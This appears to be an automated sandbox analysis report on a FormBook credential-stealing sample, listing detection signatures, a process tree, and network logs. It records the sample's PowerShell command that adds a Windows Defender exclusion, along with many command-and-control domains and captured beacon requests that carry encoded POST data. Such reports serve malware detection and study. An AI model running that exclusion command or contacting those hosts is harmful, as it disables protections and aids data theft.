Windows Analysis Report
oss4CtI8oz.exe

Overview

General Information

Sample name: oss4CtI8oz.exe (renamed because the original name is a hash value)
Original sample name: 159b534ea3ff22efd020768a9e5bb7d2766cc9d3b0e483bbc74e59009c92aa8f.exe
Analysis ID: 1634642
MD5: 0e4890b8807a50f84df18d3632968765
SHA1: fe052bffa2f799a4548f4ccf1b7b106bbc802900
SHA256: 159b534ea3ff22efd020768a9e5bb7d2766cc9d3b0e483bbc74e59009c92aa8f
Tags: exe, Formbook, user-adrian__luca

Detection

FormBook
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign process
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file name differs from the original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • oss4CtI8oz.exe (PID: 6728 cmdline: "C:\Users\user\Desktop\oss4CtI8oz.exe" MD5: 0E4890B8807A50F84DF18D3632968765)
    • powershell.exe (PID: 6192 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\oss4CtI8oz.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 5264 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • RegSvcs.exe (PID: 5652 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
      • DzuG1v7KGGzqI4w.exe (PID: 5792 cmdline: "C:\Program Files (x86)\MalPRrQeWEUjxNEYPLkWdCuSzAIOwzdgNEIZeJTUBphatQyWtkWxHRKmsimM\JlKNIEV12.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
        • finger.exe (PID: 4328 cmdline: "C:\Windows\SysWOW64\finger.exe" MD5: C586D06BF5D5B3E6E9E3289F6AA8225E)
          • DzuG1v7KGGzqI4w.exe (PID: 2964 cmdline: "C:\Program Files (x86)\MalPRrQeWEUjxNEYPLkWdCuSzAIOwzdgNEIZeJTUBphatQyWtkWxHRKmsimM\XVecnrbU.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
          • firefox.exe (PID: 4772 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • svchost.exe (PID: 4700 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
No configs have been found
Source | Rule | Description | Author
00000004.00000002.1067799190.00000000012B0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000007.00000002.3337490870.0000000000B00000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000007.00000002.3336839914.0000000000850000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000007.00000002.3337645809.0000000000B50000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000004.00000002.1066763202.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
Source | Rule | Description | Author
4.2.RegSvcs.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
4.2.RegSvcs.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security

                System Summary

Source: Process started. Author: Florian Roth (Nextron Systems). Data:
  Command / CommandLine / ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\oss4CtI8oz.exe"
  CommandLine|base64offset|contains: ~2yzw
  Image / NewProcessName / OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  ParentCommandLine: "C:\Users\user\Desktop\oss4CtI8oz.exe", ParentImage: C:\Users\user\Desktop\oss4CtI8oz.exe, ParentProcessId: 6728, ParentProcessName: oss4CtI8oz.exe
  ProcessId: 6192, ProcessName: powershell.exe
Source: Process started. Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements). Data:
  Command / CommandLine / ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\oss4CtI8oz.exe"
  CommandLine|base64offset|contains: ~2yzw
  Image / NewProcessName / OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  ParentCommandLine: "C:\Users\user\Desktop\oss4CtI8oz.exe", ParentImage: C:\Users\user\Desktop\oss4CtI8oz.exe, ParentProcessId: 6728, ParentProcessName: oss4CtI8oz.exe
  ProcessId: 6192, ProcessName: powershell.exe
Source: Process started. Author: vburov. Data:
  Command / CommandLine / ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
  CommandLine|base64offset|contains: (empty)
  Image / NewProcessName / OriginalFileName: C:\Windows\System32\svchost.exe
  ParentCommandLine: (empty), ParentImage: (empty), ParentProcessId: 628
  ProcessId: 4700, ProcessName: svchost.exe

                AV Detection

Source: oss4CtI8oz.exe; Avira: detected
Source: oss4CtI8oz.exe; Virustotal: Detection: 77%
Source: oss4CtI8oz.exe; ReversingLabs: Detection: 73%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: oss4CtI8oz.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: oss4CtI8oz.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: finger.pdb source: RegSvcs.exe, 00000004.00000002.1067580563.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp, DzuG1v7KGGzqI4w.exe, 00000006.00000002.3338837385.000000000105E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000004.00000002.1068183881.0000000001320000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000007.00000002.3340212039.0000000003150000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000007.00000003.1067736968.0000000002DF0000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000007.00000003.1076390461.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000007.00000002.3340212039.00000000032EE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000004.00000002.1068183881.0000000001320000.00000040.00001000.00020000.00000000.sdmp, finger.exe, finger.exe, 00000007.00000002.3340212039.0000000003150000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000007.00000003.1067736968.0000000002DF0000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000007.00000003.1076390461.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000007.00000002.3340212039.00000000032EE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: LouH.pdb source: oss4CtI8oz.exe
                Source: Binary string: LouH.pdbSHA256HB source: oss4CtI8oz.exe
                Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: DzuG1v7KGGzqI4w.exe, 00000006.00000000.992635700.00000000001EF000.00000002.00000001.01000000.0000000B.sdmp, DzuG1v7KGGzqI4w.exe, 00000009.00000000.1144229567.00000000001EF000.00000002.00000001.01000000.0000000B.sdmp
                Source: Binary string: finger.pdbGCTL source: RegSvcs.exe, 00000004.00000002.1067580563.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp, DzuG1v7KGGzqI4w.exe, 00000006.00000002.3338837385.000000000105E000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\finger.exe; Code function: 7_2_0086CB70 FindFirstFileW, FindNextFileW, FindClose (7_2_0086CB70)
Source: C:\Windows\SysWOW64\finger.exe; Code function: 4x nop then xor eax, eax (7_2_00859E40)
Source: C:\Windows\SysWOW64\finger.exe; Code function: 4x nop then pop edi (7_2_0085E6E6)
Source: C:\Windows\SysWOW64\finger.exe; Code function: 4x nop then mov ebx, 00000004h (7_2_02E904CE)

                Networking

                Source: DNS query: www.lenzor.xyz
                Source: DNS query: www.031233720.xyz
                Source: DNS query: www.dualbitcoin.xyz
                Source: DNS query: www.ethereumkeeper.xyz
                Source: DNS query: www.moonavatar.xyz
                Source: DNS query: www.blogkart4u.xyz
                Source: DNS query: www.splogi.xyz
Source: Joe Sandbox View; IP Address: 8.222.228.107
Source: Joe Sandbox View; IP Address: 157.112.187.77
Source: unknown; TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /0pv3/?eL7h=I6G8DBRKF3PN9Cy5HjggG2ycZCNyM0JG3kSPGuvbR5esC8dJu2EfwhpJJLd7FYxSNzCiq9OPGq3cAsVzLwaIAq+rDUC7Ws6F1E/QRL3HoNlolI9QSKQE0mSGSrcLWdFvRw==&wp=Oz9Xwzahdr HTTP/1.1Host: www.crosspatches.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
                Source: global trafficHTTP traffic detected: GET /ynw5/?eL7h=ZF/ThatktxT4IEpwfKsUOyQVHh5nHqomFNyY5ir4FklXSfOpwm6EfqJ4jyoelDA7A+pvc8dOI9DtdfL88IP+1kOCv+QPJBPSYWlpE+7rJT4XimcIjMNVjm2BzIrdTYhFEQ==&wp=Oz9Xwzahdr HTTP/1.1Host: www.quo1ybjmkhdqljoz.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
                Source: global trafficHTTP traffic detected: GET /pknc/?wp=Oz9Xwzahdr&eL7h=TsWT+PVJyweInpctzthQVdxTMr7Q3Mb2cuEH07dFoI07yBLnimF2DBYyoUH276N8oHesXX9azD5G5u0ynw8eGFj9tum9xXwIQ0i8jcSREbVxD3yrlD8BVP9rS1PvZDB20g== HTTP/1.1Host: www.lenzor.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
                Source: global trafficHTTP traffic detected: GET /hxn2/?eL7h=ZV/imptMlgE5kVt692kkoOOnpYQNqGQCFmm/TGgbqnHG1mgu4lPPJ2KHb3Eys5m88oXnT1AcDhAihVQlrO8FUlJM8pp5ZWnyQzjiEF0o+8f3DTsNGzDCqAFXqps7Otorhw==&wp=Oz9Xwzahdr HTTP/1.1Host: www.warc.techAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
                Source: global trafficHTTP traffic detected: GET /qxo2/?eL7h=o8DmqPI+VqVvnj/lu1ZpZtXdZr7bSrN2dVm8WOSQKn+kpW+rBJORjMlPia6OnGwbOFqdqYTBcx/hOJb3c+NaqPX0LJkVfisaYNtVIumZsa/w93UM+1/1xwWXjFPUQFIIoA==&wp=Oz9Xwzahdr HTTP/1.1Host: www.dualbitcoin.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
                Source: global trafficHTTP traffic detected: GET /shtf/?eL7h=FhU37QPUjXoDR/mkORBYEbzjzv1Jdaom3Ft3Wddglnt/yj+EbctenxscC0kIxMOxkZk08U8HpLn+XILh76EKfBcWBx3ZdyGeG6imEjJY2D+6g27gdHVaycndfCLvnlFPmA==&wp=Oz9Xwzahdr HTTP/1.1Host: www.lifce.lifeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
                Source: global trafficHTTP traffic detected: GET /qkhv/?eL7h=i51Ixu4M5LOvjs5atst6QhQmAxFvlGpFEg8Yva/DYuN1L4sxQPD0gcYXROip4eIGKLRWO2x5MCzKIlk6eYaz3FYy7ZtcWTJr5uThofgj61z5iUNO0ndKyizlBAbSXj3dvw==&wp=Oz9Xwzahdr HTTP/1.1Host: www.2y0uoqwoohvdf5vd.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
                Source: global trafficHTTP traffic detected: GET /gu37/?wp=Oz9Xwzahdr&eL7h=iOl0XSH5CDMOf+V9HZ+UKaCE6FMs6uPW7cxb7UU6mqRal+VgoP4cf7GVxAN/lcjotRpWXcIGUQ8s/QpRPpBC0s0rNGXrLX7QDONBrJAsmoe5Xjn3FbB7jvONWBxWv0+Npg== HTTP/1.1Host: www.ethereumkeeper.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
                Source: global trafficHTTP traffic detected: GET /36cg/?wp=Oz9Xwzahdr&eL7h=c6lcAlso4cwdWdj8OmW47AtI274xiSR94bq7w+xrmdROEAiOB56qTuKvZNoCgSLBfC/6u7yUdjQUAHkJ36WqigWvF+W/duDuE7nAcq/mnuhXg7Y1Cc7r91JMMuzgajzb2w== HTTP/1.1Host: www.blogkart4u.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
                Source: global trafficHTTP traffic detected: GET /4w1v/?eL7h=XpAG9fe2pLhJKmhZ85et2/QP5MtwFiP0J2u6NTgZVwSRoaiRiOX3KjlWgf7AqOqvMoNp5Q5VLCDsww+9yNor5ytr2WIHcAqjmNJrHjaZFAGyn8W5/AYut6n/+WvKvTb4gg==&wp=Oz9Xwzahdr HTTP/1.1Host: www.xiongding.techAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
                Source: global trafficHTTP traffic detected: GET /hlq7/?eL7h=dKN4O6z/N4DapGrcMOyrOAnbRVSrFobPG5RCVPQvSrMdLQWk1/Pc73VtQKyrUXqHVsljfksdfGpNujtuX/ZsoQbQw1ZjcAXf/RBxpP3vDPBqvfaPTUP+zIuVIrlIxG7UVQ==&wp=Oz9Xwzahdr HTTP/1.1Host: www.savposalore.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
                Source: global trafficHTTP traffic detected: GET /ti21/?eL7h=WGxoXqct8zJEPhtv7hvcADdTxPrqYVBaAgo9WLM116GuHzjz/IohiFqyzVfMSqM9DJaG8JlLLxRiginV+Pkm5SzO6x71SPK57QSrEA4wlUVlvQvqLEJhjjQQTB+w8Fkx0A==&wp=Oz9Xwzahdr HTTP/1.1Host: www.splogi.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
                Source: global trafficHTTP traffic detected: GET /pzq1/?eL7h=oDRqyMa6fuBuz7WmYIBwRJUpV6l9q4FTd5aLt2B5ybsFCSl98v1LZFy0dWfSbHe14Kep4ozyTwqi5TiZwq01U//3mNoy1jqeIyDC7DcZZUyW/Gu+bds5KjNjbZauKnuP5A==&wp=Oz9Xwzahdr HTTP/1.1Host: www.knowesis.appAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
                Source: global trafficHTTP traffic detected: GET /j64s/?eL7h=EoY4h0UyAqkEWvzM9EA/7w4uqd0YPBtkD+z/1eOQyjkeiCosMlbYcdVAn/lmFNVY6HN81TLliXNwIu9yWC9xuBVttTwnAOclpnCKNczkx83UzwDUlxWGsR49hCJNpTaAAw==&wp=Oz9Xwzahdr HTTP/1.1Host: www.jingdongpt.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
                Source: global trafficDNS traffic detected: DNS query: www.crosspatches.info
                Source: global trafficDNS traffic detected: DNS query: www.quo1ybjmkhdqljoz.top
                Source: global trafficDNS traffic detected: DNS query: www.lenzor.xyz
                Source: global trafficDNS traffic detected: DNS query: www.warc.tech
                Source: global trafficDNS traffic detected: DNS query: www.031233720.xyz
                Source: global trafficDNS traffic detected: DNS query: www.dualbitcoin.xyz
                Source: global trafficDNS traffic detected: DNS query: www.lifce.life
                Source: global trafficDNS traffic detected: DNS query: www.2y0uoqwoohvdf5vd.top
                Source: global trafficDNS traffic detected: DNS query: www.ethereumkeeper.xyz
                Source: global trafficDNS traffic detected: DNS query: www.moonavatar.xyz
                Source: global trafficDNS traffic detected: DNS query: www.blogkart4u.xyz
                Source: global trafficDNS traffic detected: DNS query: www.xiongding.tech
                Source: global trafficDNS traffic detected: DNS query: www.savposalore.shop
                Source: global trafficDNS traffic detected: DNS query: www.splogi.xyz
                Source: global trafficDNS traffic detected: DNS query: www.knowesis.app
                Source: global trafficDNS traffic detected: DNS query: www.jingdongpt.shop
                Source: unknownHTTP traffic detected: POST /ynw5/ HTTP/1.1Host: www.quo1ybjmkhdqljoz.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Origin: http://www.quo1ybjmkhdqljoz.topReferer: http://www.quo1ybjmkhdqljoz.top/ynw5/Connection: closeCache-Control: no-cacheContent-Length: 205Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1Data Raw: 65 4c 37 68 3d 55 48 58 7a 69 74 35 69 68 6d 6e 75 56 45 64 6d 57 71 6f 47 48 51 30 58 4d 6a 70 55 53 66 4d 72 48 50 71 38 77 43 7a 4e 49 56 78 43 52 74 66 75 36 55 33 36 51 76 59 65 6e 54 74 67 73 68 6f 4e 49 63 70 64 59 38 5a 56 51 4e 79 52 66 76 4c 2b 33 38 65 2f 6a 30 6d 39 70 74 46 78 59 52 62 57 66 6d 6f 36 44 50 61 4a 4c 48 6b 61 6b 46 77 49 6f 2f 78 50 75 57 47 7a 34 6f 33 6b 48 73 6f 64 65 6f 67 65 64 66 56 35 48 69 63 45 62 63 42 79 32 61 79 74 33 53 50 4a 36 49 7a 6d 57 58 4b 65 47 38 45 41 2b 6d 63 37 4a 59 36 38 4d 6e 64 71 63 4f 31 6f 30 74 33 57 34 36 36 53 34 56 5a 46 57 45 56 41 54 44 67 3d Data Ascii: eL7h=UHXzit5ihmnuVEdmWqoGHQ0XMjpUSfMrHPq8wCzNIVxCRtfu6U36QvYenTtgshoNIcpdY8ZVQNyRfvL+38e/j0m9ptFxYRbWfmo6DPaJLHkakFwIo/xPuWGz4o3kHsodeogedfV5HicEbcBy2ayt3SPJ6IzmWXKeG8EA+mc7JY68MndqcO1o0t3W466S4VZFWEVATDg=
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 11 Mar 2025 01:49:46 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 11 Mar 2025 01:49:48 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 11 Mar 2025 01:49:51 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
